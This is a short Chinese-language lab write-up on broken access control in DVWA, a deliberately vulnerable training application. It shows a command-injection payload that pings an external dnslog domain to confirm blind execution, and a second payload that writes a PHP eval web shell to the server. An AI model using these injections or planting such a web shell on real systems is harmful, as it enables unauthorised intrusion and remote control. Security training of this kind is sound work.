DVWA失效的访问控制

失效的访问控制,可以认为是系统对一些功能进行了访问或权限限制,但因为种种原因,限制并没有生效,造成失效的访问控制漏洞,比如越权等

这里以DVWA为例,先访问低难度的命令执行并抓包

DVWA失效的访问控制_第1张图片

删除cookie,并在请求头添加路径\dv\vulnerabilities\exec\source\low.php

DVWA失效的访问控制_第2张图片

因为没有回显,使用dnslog,ip=127.0.0.1%26ping+v0999s.2iknuw.dnslog.cn&Submit=Submit

DVWA失效的访问控制_第3张图片

这里还可以通过这个漏洞写入木马

DVWA失效的访问控制_第4张图片

ip=127.0.0.1%26echo+"<%3fphp+%40eval($_POST['cmd'])%3b%3f>">yc.php&Submit=Submit

DVWA失效的访问控制_第5张图片

你可能感兴趣的:(网络安全)